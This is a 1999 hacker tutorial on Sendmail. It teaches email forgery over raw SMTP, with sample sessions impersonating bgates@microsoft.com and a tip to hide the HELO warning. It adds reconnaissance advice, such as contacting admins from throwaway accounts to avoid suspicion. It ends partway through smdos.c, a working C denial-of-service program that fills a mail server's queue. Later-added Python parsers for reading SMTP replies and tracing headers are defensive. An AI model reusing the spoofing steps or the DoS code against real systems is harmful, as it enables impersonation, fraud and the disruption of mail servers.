version 2.1, 22/9/99
Converted to HTML by Penguin
Note: whenever you see something like this: blah(1),
it means that if you don't understand the meaning of the
word blah there's an explanation for it just for you,
located at the newbies corner on section 1.
Author's notes
If you have any comments or questions regarding this
tutorial (no flames or spam, please) Email me at
barakirs@netvision.net.il. Visit blacksun.box.sk for more
tutorials, free hacking/programming/unix books to download
and much more.
Disclaimer
We do not encourage any kinds of illegal activities. If you
believe that breaking the law is a good way to impress
someone, please stop reading now and grow up. There is
nothing impressive or cool in being a criminal.
Contents
Sendmail? Huh?
What is Sendmail?
What is it used for?
Why would I want to learn about Sendmail?
How do I create authentic-looking fake mails?
You mean I can send Emails from bgates@microsoft.com or bclinton@whitehouse.org?!
Is it possible to create a 100% authentic Email?
How can I learn raw Sendmail commands by myself?
But what if I'm lazy? Can you pleeease teach me?
How do I track down carelessly-made fake mails?
How do I track down more sophisticated fake mails?
Can I get caught?
Will I get caught?
Hack the server? Through Sendmail?!
Can I really hack a host that runs Sendmail?
So why is Sendmail called "the buggiest daemon on Earth" anyway?
Okay, great. Now how do I do it?
Can you tell me more about various Sendmail security holes?
Where can I find more Sendmail security holes?
How can I tell what version of Sendmail the target host is running?
Why should I care anyway?
How can I use the BugTraq archives to find the holes I'm looking for?
Can I get caught?
Will I get caught?
Final Notes
Okay, so I can hack a host which runs Sendmail. How do I do it?
* A Local DoS(29) in All Sendmail Versions Up to 8.9.3
* Bug in Sendmail's HELO command
* Giant Bug in Sendmail 8.8.4
* Final Notes
Newbies corner
What is a daemon?
What is a port?
What is a service?
What is a daemon banner?
What is a timeout (in computer terms)?
What is TCP and how does it work?
What is UDP and how does it work?
What is ICMP and how does it work?
What is an IP address?
What is a hostname?
How to find out what your ISP's mail servers are?
What is a portscanner?
What is a services scanner?
What/who is root?
What is bandwidth?
What is a client program?
What is a DNS server?
What is Telnet (the Telnet daemon and the Telnet program)?
What is a command interpreter?
What is a shell account?
Who is a sysadmin?
What is hyper text?
What is an RFC?
What is InterNIC?
What is a sub domain (and how much does a domain really cost?)?
What is SSH?
What is a moderated mailing list / message board?
What is a DoS attack?
What is DUN?
What is a dial-up account?
What is a Unix password file?
What is a thread?
Appendix A: Fake Daemons
Fake Sendmail daemon
Fake Telnet daemon
Appendix B: Routing Mail
How can I route my mail?
How would that help me?
Appendix C: Faking the sender's IP
How can I fake my IP on the Email's header?
Where can I read more about this kind of stuff?
Appendix D: Reply-to
What does the Reply-to option do?
How do I use it?
Appendix E: CC and BCC
What do these commands do?
How do I use them?
References
RFC 821
Bibliography
Sam Spade's Library
Various online magazines
BugTraq's archives
Packet Storm Security
Security Focus
Rootshell
Hackersclub
Sendmail? Huh?
Sendmail is a daemon(1) which waits for connections on
port(2) 25. It is used to send outgoing mail.
For example: your Email provider (probably your ISP
(Internet Service Provider)) probably uses two servers
(unless it's a web-based mail account such as Hotmail.com):
1) mail.boring-ISP.net (probably port 110): for incoming
mail.
2) mailgw.boring-ISP.net (port 25): for outgoing mail.
Most mail servers look pretty much like this, but the addresses vary between ISPs.
Mail.boring-ISP.net would require a username and a password so other people won't be able to read your Emails, so let's skip this one (I might discuss cracking those passwords in another tutorial, but remember - I'm teaching you these things so you'll know how malicious crackers work and not fall for their tricks, not so you can break the law and harm others). Now, as surprising as it may sound, mailgw.boring-ISP.net will not require a password or any other means of identification. If you telnet(19) into mailgw.boring-ISP.net on port 25 and type in the right commands you will be able to send fake mails. Interesting, huh?
Now, the coolest part is that you can actually hack a
server running Sendmail or at least bring it down, since
Sendmail contains a crapload of bugs and security holes.
How can I create authentic-looking fake mails?
As mentioned in the previous chapter, sending mail does not
require you to have an account on the machine you're sending
the mail from (the mail server, not your computer). All you
need to know is the IP Address(9) / Hostname(10) of the mail
server and Sendmail commands.
So far we assume that you know the IP/hostname of your
target. If you still don't know this important detail,
please find out(11).
Now, let's get on with it. This time, unlike previous
tutorials, I will "learn" all over again how to do
everything I describe here and walk you through the entire
process of learning and using what you have learnt.
Alright, let's begin.
Our target outgoing mail server for today is
mailgw.someone.com on port 25.
First, let's telnet into that port. You can do this in one of three ways:
1) On a standard Unix text-based system, type 'telnet mailgw.someone.com 25' (without the quotes).
2) On Windows, run C:\Windows\telnet.exe or your favorite telnet application and type mailgw.someone.com in the host field and 25 in the port field.
3) From XWindows (a graphical interface for Unix; if you're smart enough to be running some version of Unix you shouldn't have a hard time finding one, and if you don't like the default telnet programs you could always go to www.linuxberg.com and grab one), run your favorite telnet application and type in the correct details (host and port).
Note about VT: you might be asked to choose a terminal type
during the connection process. Something with VT and some
number in it... hmm...
VT stands for Virtual Terminal. Since there are several types of terminals (all sorts of monitors, old printer terminals etc.) you are asked to choose a terminal type (compatibility issues). VT100 should suit most people just fine.
Note about shell accounts(21): if you're not running Unix and you wish to use Unix tools on Unix systems while you work, telnet to nether.net on port 23, login as newuser and get yourself a free shell account. If you'd rather use Windows tools, go ahead (things will work faster since the tools are actually located on your machine, not on some distant computer which hosts your shell account). I use Windows tools when I work from Windows, except in certain cases when I really NEED Unix and don't want to reboot into it; in that case I get myself a shell account so I can use Unix stuff while working from Windows. Still, I recommend that you get a shell account at nether.net (in fact they teach you a lot of great Unix-newbies stuff when you sign up).
Note about Telneting from Macintosh: Macintosh does not
come with a Telnet program. However, you can download one
from: http://www.ncsa.uiuc.edu/SDG/Software/MacTelnet/
(thanks to little_v for this one!).
Now, let's see what we get after we telnet(19) to
mailgw.someone.com:25 (in this case, the character : stands
for 'on port', so
mailgw.someone.com:25 means mailgw.someone.com on port 25).
220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)
AHA!
This is... this is... ugh... WHAT THE HELL IS THIS THING?!
This, my friends, is a daemon banner(4), and it just gave
us tons of valuable pieces of information!
Normally, this info is intended for a client program(16), so it can determine what version of Sendmail the target is running and how to communicate with it (the program should know that, for example, every Sendmail version below 7.0.0 uses the command 'halb' instead of the command 'blah', etc.).
This daemon banner thing is also great for hackers and crackers, since we can determine what version our target is running. Later, when we discuss how to actually hack the server, this data will be EXTREMELY valuable.
Okay, let's analyze what we've got...
220... we don't know what this is right now...
alpha.someone.com... no luck, can't make anything out of it
so far...
ESMTP... hmm... SMTP stands for Simple Mail Transfer Protocol. It is the protocol(18) used by email clients to communicate with Sendmail daemons, and this is what we're trying to learn right now. ESMTP is Extended SMTP. It's the same as SMTP, only it contains some more commands. Let's leave this alone for the time being.
Sendmail 8.9.3/8.8.6 - AHA! There's something interesting. We got the version of the Sendmail daemon! Remember this, it will help us during the next chapter (hacking into servers that run Sendmail). The rest is garbage (time, date, etc.).
Okay, so let's move on... umm... how do I communicate with this thing?
Er... let's try typing 'help' (without the quotes). Oh, by
the way, it is normal not to see what you type when you talk
to Sendmail since it won't send back your keystrokes. You
have to turn on "local echo" in your telnet program in order
to see what you type.
214-This is Sendmail version 8.9.3
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
Wee!
This is cool!!
By this time you should have guessed that this number (the 220 in the daemon banner and the 214 here) is actually a 'message type'. It states the type of the message you got. Each type of message (error because of this, error because of that, help page for this, confirmation message for that etc.) has its own number.
Okay, let's move on. Let's try typing 'help helo'.
214-HELO <hostname>
214- Introduce yourself.
214 End of HELP info
See? I told you so. 214 is the message type number for help messages.
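Here is a small parser, added as an example and not part of the original tutorial, that does what we just did by eye: it splits server output into replies (including the multi-line "214-" form), classifies each one by its first digit, and pulls the version out of the 220 banner and the queue id (the "MID" below) out of the final 250. The transcript inside it is constructed from this chapter's session; the function names are mine.

```python
"""Parse what a Sendmail server sends back, as the tutorial reads it by hand.

Added example, not from the tutorial. A reply line is a three-digit code
followed by "-" (more lines of the same reply follow) or a space / end of
line (last line of the reply). The transcript below is constructed from
the tutorial's own session.
"""
import re
from dataclasses import dataclass, field

_LINE = re.compile(r"^(\d{3})([ -]?)(.*)$")
_VERSION = re.compile(r"\bSendmail ([\w./-]+)")
_QUEUE_ID = re.compile(r"^([A-Za-z]{3}\d{5}) Message accepted for delivery")


@dataclass
class Reply:
    code: int
    lines: list = field(default_factory=list)

    @property
    def kind(self):
        """Reply class by first digit (RFC 821 section 4.2)."""
        return {2: "ok", 3: "send more (e.g. the message body after DATA)",
                4: "transient failure", 5: "permanent failure"}.get(self.code // 100, "unknown")


def parse_replies(text):
    """Group a transcript of server output into complete Reply objects."""
    replies, current = [], None
    for raw in text.splitlines():
        m = _LINE.match(raw)
        if not m:
            raise ValueError(f"not a reply line: {raw!r}")
        code, sep, rest = int(m.group(1)), m.group(2), m.group(3).strip()
        if current is None:
            current = Reply(code)
        elif code != current.code:   # a reply never changes code part-way
            raise ValueError(f"code changed mid-reply: {current.code} -> {code}")
        current.lines.append(rest)
        if sep != "-":               # "214 " or bare "214": last line of this reply
            replies.append(current)
            current = None
    if current is not None:
        raise ValueError("transcript ends inside a multi-line reply")
    return replies


def sendmail_version(banner):
    """'220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; ...' -> '8.9.3/8.8.6'."""
    m = _VERSION.search(banner)
    return m.group(1) if m else None


def queue_id(reply):
    """Queue id from '250 CAA15313 Message accepted for delivery', else None."""
    m = _QUEUE_ID.match(reply.lines[0]) if reply.code == 250 else None
    return m.group(1) if m else None


# Constructed transcript: the server side of the tutorial's session, in order.
SESSION = """\
220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)
214-This is Sendmail version 8.9.3
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
250 bgates@microsoft.com... Sender ok
250 victim@victim.com... Recipient ok
354 Enter mail, end with "." on a line by itself
250 CAA15313 Message accepted for delivery
"""

if __name__ == "__main__":
    for r in parse_replies(SESSION):
        print(r.code, r.kind, "|", r.lines[0])
```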
Okay, so that way you can practically teach yourself what every Sendmail command does. Stop right now, read all the help pages and then continue. It is important that you learn how to learn things by yourself. You might see some notes concerning the word RFC(24) and some numbers. You can find RFCs at http://www.linuxberg.com.
Note about ESMTP: remember that ESMTP thing we came across?
You'll be able to get a good clue on what ESMTP is by
reading the help pages. Yes, I am trying to force you to
read them... so please do. They contain tons of great
information for newbies as well as pros.
Okay, I'm assuming you've finished reading all those help
pages. Now let's move on.
First we need to enter a sender. We do this by typing 'MAIL
FROM: <fake Email address>' (remove the quotes and replace
fake Email address with the fake Email address of your
choice, say... bgates@microsoft.com (but leave the < and the
>)).
The mail server should reply with this message:
250 bgates@microsoft.com... Sender ok
Next we type 'RCPT TO: <recipient>'. Replace recipient with
the target, say victim@victim.com. We should get
250 victim@victim.com... Recipient ok
You can add more recipients by simply repeating this command with different recipients.
Now, let's move on to the actual message body. Type 'data'
to start writing the body of the message.
354 Enter mail, end with "." on a line by itself
Now let's type in some stuff...
Subject: fake message (note about this line: in this line
you get to determine what subject you want to give for your
message).
Hello. This is a fake Email message.
I'm bored.
Gimme something to hack!!
.
Now we get this
250 CAA15313 Message accepted for delivery
You must be wondering right now what that number after the 250 is. This is called the message ID (or MID). It's just a stupid number, but we'll use it later... don't you worry your pretty head about this.
Now, if you were the recipient you would have got a 100% authentic-looking fake mail. OR IS IT?
Let's take a look at what the recipient would get...
Hmm... welp, looks like an ordinary message to me. At least
it does to the ordinary user.
Now let's look at the headers.
Headers are a couple of lines which come with every Email message. Most of today's Email clients show only the simpler parts of the header (sender, subject, date and time etc.), but right now we need the full header.
On Netscape Messenger displaying the full headers is done by going to View ==> Headers ==> All.
On Eudora this is done by clicking on the button which
displays the "blah blah blah" caption when you put your
mouse cursor above it for a second or two.
Compuserve automatically displays the full header.
On Outlook, right click the message on your inbox, choose
properties and choose details.
On pine, you should have an option somewhere in the configuration screens that lets you choose what kind of header you want to view (full or brief).
Now let's take a look at the full header, shall we?
Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13])
    by cmx.netvision.net.il (8.9.3/8.9.3) with ESMTP id CAA15313
    for <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300 (IDT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225])
    by alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313
    for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355.CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use HELO protocol
Subject: Fake mail
Status:
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 3752da3b000002ff
Yeehaw! Look at all those numbers and letters and shiny
things!
Let's start from the top, shall we?
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13]) by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970 for <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
Okay, so the mail was received from alpha.someone.com (alpha.someone.com [194.90.1.13]). What does that mean?
A quick check of InterNIC(25)'s databases (type 'whois alpha.someone.com' without the quotes on a Unix system or download SamSpade for Windows at www.samspade.org) reveals that it is owned by someone.com. This is probably some kind of sub-server they use to send mail. Let's leave it alone, it's not important to us right now. The (alpha.someone.com [194.90.1.13]) part shows you the hostname(10) and the IP address(9) of the server the Email was sent from.
Ooh, ooh, wait! Wasn't the mail supposed to be sent from
microsoft.com? I mean, the sender is bgates@microsoft.com!
If we did the mail forging thing on microsoft.com instead
of on someone.com this wouldn't have happened, now would it?
It would have seemed like an ordinary Email... from Bill
Gates... well, at least so far.
Anyway, the rest is just the MID (which we will get to later) and the date of the message (the sending date) according to the server which the message was sent from. The +0000 (GMT) part means that it was sent from the Greenwich time zone. If it was sent, for example, from the +0200 time zone it would have meant that this time zone's time is actually Greenwich time plus 2 hours. Find out your own time zone first so you'll be able to convert between time zones and find out when the message was sent in your local time.
Now, on to more important things.
From: bgates@microsoft.com
Well, I guess this line is obvious... let's move on.
Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Okay, now this is really interesting. Now we get the
sender's hostname and IP address.
Note about the hostname: a dial-up(31) user will have a
long and twisted hostname. For example: my hostname right
now (at least when I was writing these lines) is
RAS4-p97.hfa.netvision.net.il. Netvision.net.il is my ISP,
and the rest is mostly crap (pay close attention to the hfa
thing. Hfa stands for Haifa, which is my home town. It means
that I'm connected through Netvision's Haifa server. See?
Hostnames can be interesting).
You must have noticed by now that the hostname we got is certainly not from microsoft.com, and that the mail server that sent this isn't exactly microsoft.com or a microsoft sub-domain(26) either, which clearly shows that this Email is completely fake.
Another note about the hostname: sometimes you might not
get a hostname, but you will always get an IP address. You
can find the IP's hostname (most IP addresses do have a
hostname) by doing 'nslookup ip-address' without the quotes
on a Unix system or going to http://www.samspade.org and
using their DNS(17) Lookup Tool. If you still can't get it,
try doing a whois.
To overcome this problem, you need to do two things:
1) Send this mail from Microsoft's Sendmail server.
2) Send this mail from an account that is connected to the
web through Microsoft. If you can't get one, it will clearly
show in the headers that the mail wasn't sent from
Microsoft.
Note: nice trick to pull on someone: if your ISP is
blah.com, you can send your friends an Email from
admin@blah.com which will look 100% authentic!
Anyway, the next few characters give us the MID (Message
ID), as well as other pieces of info. I promised we'll get
to the MID, didn't I?
If you think someone is trying to trick you into thinking
he's somebody else, send an Email to abuse@your.ISP.com or
abuse@the.ISP.where.the.message.came.from.com (in this case
Microsoft.com) or abuse@the.server.who.stores.the.MID.com.
To know which server stores the MID, we'll need to skip a
few lines (two lines actually - time and date) and get
straight to this:
Message-ID: <199907092355.CAA15313@alpha.someone.com>
Aha! Look at these interesting numbers! And check this out: CAA15313@alpha.someone.com! This means all the info regarding the MID is stored at alpha.someone.com! Let's send an Email to abuse@alpha.someone.com and tell them that we think we received a fake mail, and include the entire header. Next we'll do the same with the ISP of the sender (in our case, the sender is some.hostname.crap.com [62.0.146.225], meaning his ISP is probably crap.com).
Now, on to the next line:
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use HELO protocol
Damn! I knew we forgot something! Now let's do it all over
again, but this time we'll type HELO microsoft.com at the
beginning.
HELO microsoft.com
We get this:
250 mailgw1.netvision.net.il Hello some.hostname.crap.com [62.0.146.225], pleased to meet you
The rest is exactly like the last time (sender, rcpt to, etc.). Now let's see what victim@victim.com would have gotten.
Aha! No X-Authentication-Warning!
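The header check this chapter does by hand, automated as an added example (not from the original tutorial): it walks the Received: chain bottom-up, trusts only what the relay observed in brackets rather than the name the client typed in HELO, and reports the X-Authentication-Warning when it is present. Both header samples are constructed from this chapter's session; the second one (after HELO microsoft.com) assumes Sendmail's usual "from <helo-name> (<reverse-dns> [<ip>])" Received: format.

```python
"""Trace a forged message back through its Received: headers.

Added example; not part of the tutorial. Each relay prepends its own
Received: line, so the LAST one in the header is the first hop, and the
bracketed part of that line is what the relay itself observed about the
connecting host. The HELO name in front of it is whatever the client typed.
"""
import re
from email import message_from_string

# Sendmail 8.x format: "from <helo-name> (<reverse-dns> [<ip>]) by <relay> ..."
_RECEIVED = re.compile(
    r"from\s+(?P<helo>\S+)\s*"
    r"(?:\((?P<rdns>[^\s\[\]()]+)?\s*\[(?P<ip>[\d.]+)\]\))?"
    r"\s+by\s+(?P<by>\S+)"
)


def parse_received(value):
    """One Received: header -> dict(helo, rdns, ip, by), or None if unparseable."""
    m = _RECEIVED.search(" ".join(value.split()))   # unfold continuation lines
    return m.groupdict() if m else None


def hops(raw):
    """Return the parsed Received: chain in travel order: index 0 = origin."""
    msg = message_from_string(raw)
    parsed = [parse_received(v) for v in msg.get_all("Received", [])]
    return [h for h in reversed(parsed) if h]


def analyse(raw):
    msg = message_from_string(raw)
    chain = hops(raw)
    from_domain = msg.get("From", "").rsplit("@", 1)[-1].strip("<> ").lower()
    origin = chain[0] if chain else None
    findings = []
    if origin:
        # Only the server-observed names count; the HELO name is attacker-supplied.
        observed = [n for n in (origin["rdns"], origin["by"]) if n]
        if not any(n.lower().endswith(from_domain) for n in observed):
            findings.append(
                f"From: claims {from_domain} but the first hop was "
                f"{origin['rdns'] or '?'} [{origin['ip']}] via {origin['by']}")
        if origin["rdns"] and origin["helo"].lower() != origin["rdns"].lower():
            findings.append(
                f"HELO name {origin['helo']} does not match reverse DNS {origin['rdns']}")
    for w in msg.get_all("X-Authentication-Warning", []):
        findings.append("relay warned: " + " ".join(w.split()))
    mid = re.search(r"@([\w.-]+)>", msg.get("Message-ID", ""))
    return {
        "origin_ip": origin["ip"] if origin else None,
        "queue_host": mid.group(1) if mid else None,  # who holds the queue-id logs
        "findings": findings,
    }


# Constructed: what victim@victim.com received from the first attempt (no HELO).
NO_HELO = """\
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
    by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970
    for <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225])
    by alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313
    for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355.CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com
    [62.0.146.225] didn't use HELO protocol
Subject: Fake mail

Hello. This is a fake Email message.
"""

# Constructed: the second attempt, after "HELO microsoft.com". The warning is gone,
# but the relay still records the real host in brackets next to the claimed name.
WITH_HELO = NO_HELO.replace("from some.hostname.crap.com (", "from microsoft.com (")
WITH_HELO = re.sub(r"X-Authentication-Warning:.*?\n(?=\S)", "", WITH_HELO, flags=re.S)

if __name__ == "__main__":
    for name, raw in (("no HELO", NO_HELO), ("HELO microsoft.com", WITH_HELO)):
        print(name, analyse(raw))
```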
Final notes
I hope you enjoyed this chapter. Now you've learnt how to play harmless and legal tricks on your friends, how to track down fake mails and how easy it is to catch you if you're trying to do illegal stuff.
Oh, and by the way, there is a way to hide your IP/hostname
when faking mail... for more information, read the second
section in the 'Okay, so I can hack a host which runs
Sendmail. How do I do it?' chapter.
Hack the server? Through Sendmail?!
Yeah, sure, why not? I mean, EVERY service(3) is vulnerable to some attacks. That's why it is recommended to run as few services as possible on your computer.
But the most vulnerable one is Sendmail (this is why it is called 'the buggiest daemon on Earth' or 'the buggiest daemon on the planet'). A member of the mailing list once told me that he just can't wait to read the Sendmail Tutorial (this was before this tutorial was released) and that he himself runs Sendmail on his computer. Running Sendmail on a personal computer is unnecessary and dangerous. If your computer does not act as a mail server, there is no reason for you to run Sendmail (unless you want people to be able to send mail to your-account@your.IP.address instead of your-account@your.ISP.com. Note about your-account: in the first address, your-account is the name of your username on your own computer (Unix users should know what I am talking about). In the second address, your-account is your username at your ISP).
Note: the information in this chapter can be either used to
hack servers, or the other way around - to protect your
server. Please don't break the law, or at least don't spew
out my name during the investigations... hehe...
Okay, so the first thing we have to do in order to hack a server through a specific service (or to improve the security of a specific server) is to find out the service's version. This can be easily done by viewing the daemon banner(4). Suppose we came across a computer that runs Sendmail 8.8.3 (which was quite old when this tutorial was written, meaning there should be a couple of bugs here. Sendmail is upgraded mostly when a new bug is found. In fact, everything except the daemon's security is rarely changed during upgrades).
Next, we'll try to determine the OS (Operating System) which this daemon runs on. If Sendmail's banner won't tell us, the Telnet(19) daemon will. First telnet to port 23 and cross your fingers. If there's a daemon on that port, it's probably the Telnet daemon, and it'll probably give you the name and version of the OS. If not, you can either:
1) Try looking for a guest account (username: guest,
password: guest or username: newuser, password: newuser),
since some systems give you these details only after you log
in.
2) Email admin@your-target.com and ask him (I recommend
opening a mailbox on one of those free mailbox services such
as Hotmail and Emailing him from there, since some
admins(22) might get a little suspicious...).
3) Try going to your target's website. This kind of
information might be there, somewhere.
If you still haven't found the OS, fear not! We might still be able to do a cool hack without this information, but it might still come in handy, so do all you can to get your hands on it.
Next thing, you browse some online databases until you find
the hole you've been looking for. First of all I'll explain
about the largest and most recommended online databases, and
then I'll teach you how to search them, plus some valuable
concepts and words you need to get familiar with.
Packet Storm Security
URL: http://packetstorm.securify.com.
One of the largest online databases for security-related
information. I recommend going there once a day and reading
the 'New Files Today' section, whether you're looking for
specific holes or not.
The archive was founded by Ken Williams and gets hundreds
of thousands of hits per week.
It has recently been transferred into the ownership of Kroll-O'Gara (www.securify.com).
Security Focus
URL: http://www.securityfocus.com.
Another comprehensive database. Updated daily. These guys
never sleep!
BugTraq
URL: hosted by Security Focus (http://www.securityfocus.com), previously hosted by Netspace (http://www.netspace.org).
BugTraq is one of the best security mailing lists out there. The list is moderated, meaning that if you find a new security hole, you can only send your message to the moderator, Aleph1 (aleph1@underground.org). Aleph1 filters out all the spam, lame messages and old bugs and posts only the good ones to the list.
I recommend signing up at http://www.securityfocus.com. You
can also search their archive, which is by the way my
favorite security-related database, by going to
securityfocus.com and looking for a link called 'search'.
Searching
If we are looking for a bug in Sendmail 8.8.3, we'll need to type the following search keywords: 'sendmail 8.8.3' (without the quotes). If we're looking for something specific, such as a local DoS(29) attack against any version of sendmail, we will use the following search keywords: 'local DoS sendmail', etc.
Searching Packet Storm
Packet Storm should have a search box somewhere (Ken
changes the layout every now and then so I can't give you
the exact location of the box). You can divide the search
results you will get into two categories: texts and
programs.
For example: you searched for a specific hole and you got a couple of text files and a couple of programs. The text files explain the bug and how to exploit it, while the programs use the hole to get in.
These programs are often called 'exploits' and usually come as source code instead of as a binary file. Let me explain: a binary file is any file that isn't made of text. Executable files are usually binary files. Now, in our case, programs come as source instead of binary. Source code is in the form of plain text, and it's actually a bunch of commands. When given to a compiler, this source code turns into an executable binary (except for source code written in the Perl programming language, which can be executed directly as source if you have the Perl interpreter). Anyway, these programs come in the form of source so you will be able to understand how they work instead of blindly running them.
Searching Security Focus
Security Focus offers more organized information. Instead of various bits of information, Security Focus offers articles. These include exact definitions of the bug, where and when it should happen, work-arounds (how to solve it) etc. The only drawback of Security Focus is that it is smaller than other databases.
BugTraq
Ah... my favorite database. When people post something to BugTraq about a security hole they found, other people can reply to them and share their side of the story. For example: did it work on their computer too, how to fix the bug in various ways, what causes the bug in the first place etc. You can compile a full database with all of the necessary information by simply reading a couple of posts.
Getting Caught
If you're planning on doing something bad, please don't.
You can get caught. Better crackers than you already got
caught. Don't be stupid.
Okay, so I can hack a host which runs Sendmail. Now how do I do it?
I have made a nice list with several security holes
regarding Sendmail just to give you the hang of it.
A Local DoS(29) in All Sendmail Versions Up to 8.9.3 (taken
from Packet Storm)
Date: Sat, 3 Apr 1999 00:42:56 +0200
From: Michał Szymański <siwa9@BOX43.GNET.PL>
To: BUGTRAQ@netspace.org
Subject: Re: Possible local DoS in sendmail
Hi folks,

This local queue filling DoS attack in sendmail is quite dangerous. But good security policy (like mine) will prevent attackers from doing such things. Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned by root.attacker's_group; turn on quotas for group 'attacker's_group' on the file system containing the /var/spool/mqueue directory, and your host will not be vulnerable; but you _have to_ configure your sendmail as a _nosuid_ daemon.

Much more dangerous are remote queue filling DoS attacks. If you have enabled relaying, you can use the smdos.c proggie shown below; it will quite quickly fill up the partition on disk where /var/spool/mqueue resides. You should notice increased LA during the attack; in contrast to local DoS attacks, control files created by smdos.c are owned by root.root, so ... it's much more difficult to prevent offenders from doing it.

Don't forget to change the BSIZE definition (in smdos.c) to the appropriate victim host's message size limitation (MaxMessageSize option); you can also increase the MAXCONN definition.
smdos.c:
--- CUT HERE ---
/*
By Michal Szymanski <siwa9@box43.gnet.pl>
Sendmail DoS (up to 8.9.3);
Sat Apr 3 00:12:31 CEST 1999
*/
#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>      /* strlen() */
#include <strings.h>     /* bzero(), bcopy() */
#include <unistd.h>      /* read(), write(), fork(), close(), sleep(), usleep() */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>    /* waitpid() */
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#undef VERBOSE /* define it, if MORECONN is undefined */
#define MORECONN
// #define RCPT_TO "foo@ftp.onet.pl"
#define RCPT_TO "foo@10.255.255.255"
#ifdef MORECONN
#define MAXCONN 5
#endif
#define BSIZE 1048576 /* df* control file size */
#define PORT 25
char buffer[BSIZE];
int sockfd,x,loop,chpid;

void usage(char *fname) {
  fprintf(stderr,"Usage: %s <victim_host>\n",fname);
  exit(1);
}

/* send one SMTP line, pause briefly, then read (and in VERBOSE mode print) the reply */
void say(char *what) {
  if (write(sockfd,what,strlen(what))<0) {
    perror("write()");
    exit(errno);
  }
#ifdef VERBOSE
  fprintf(stderr,"<%s",what);
#endif
  bzero(buffer,BSIZE);
  usleep(1000);
  if (read(sockfd,buffer,BSIZE)<0) {
    perror("read()");
    exit(errno);
  }
#ifdef VERBOSE
  fputs(buffer,stderr); /* was fprintf(stderr,buffer): server data must not be used as a format string */
#endif
}

int main(int argc,char *argv[]) {
  struct sockaddr_in serv_addr;
  struct hostent *host;
  char *hostname,hostaddr[20];
  fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");
  if (argc<2) usage(argv[0]);
#ifdef VERBOSE
  fprintf(stderr,">Preparing address. \n");
#endif
  hostname=argv[1];
  serv_addr.sin_port=htons(PORT);
  serv_addr.sin_family=AF_INET;
  if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) {
#ifdef VERBOSE
    fprintf(stderr,">Getting info from DNS.\n");
#endif
    if ((host=gethostbyname(hostname))==NULL) {
      herror("gethostbyname()");
      exit(h_errno);
    }
    serv_addr.sin_family=host->h_addrtype;
    bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length);
#ifdef VERBOSE
    fprintf(stderr,">Official name of host: %s\n",host->h_name);
#endif
    hostname=host->h_name;
    sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
            (unsigned char)host->h_addr[1],
            (unsigned char)host->h_addr[2],
            (unsigned char)host->h_addr[3]);
  }
  else snprintf(hostaddr,sizeof(hostaddr),"%s",hostname); /* bounded: hostaddr is only 20 bytes */
#ifdef MORECONN
  /* fork MAXCONN children, each running the connection loop below forever
     (this line was mangled in the archived copy and is reconstructed here) */
  for (;loop<MAXCONN;loop++) { if (!(chpid=fork()))
#endif
  for(;;) {
    bzero(&(serv_addr.sin_zero),8);
    if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) {
      perror("socket()");
      exit(errno);
    }
    if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) {
      perror("connect()");
      exit(errno);
    }
#ifdef VERBOSE
    fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
#endif
    bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE); /* swallow the 220 banner */
#ifdef VERBOSE
    fputs(buffer,stderr);
#else
    fprintf(stderr,".");
#endif
    say("helo foo\n");
    say("mail from:root@localhost\n");
    say("rcpt to:" RCPT_TO "\n");
    say("data\n");
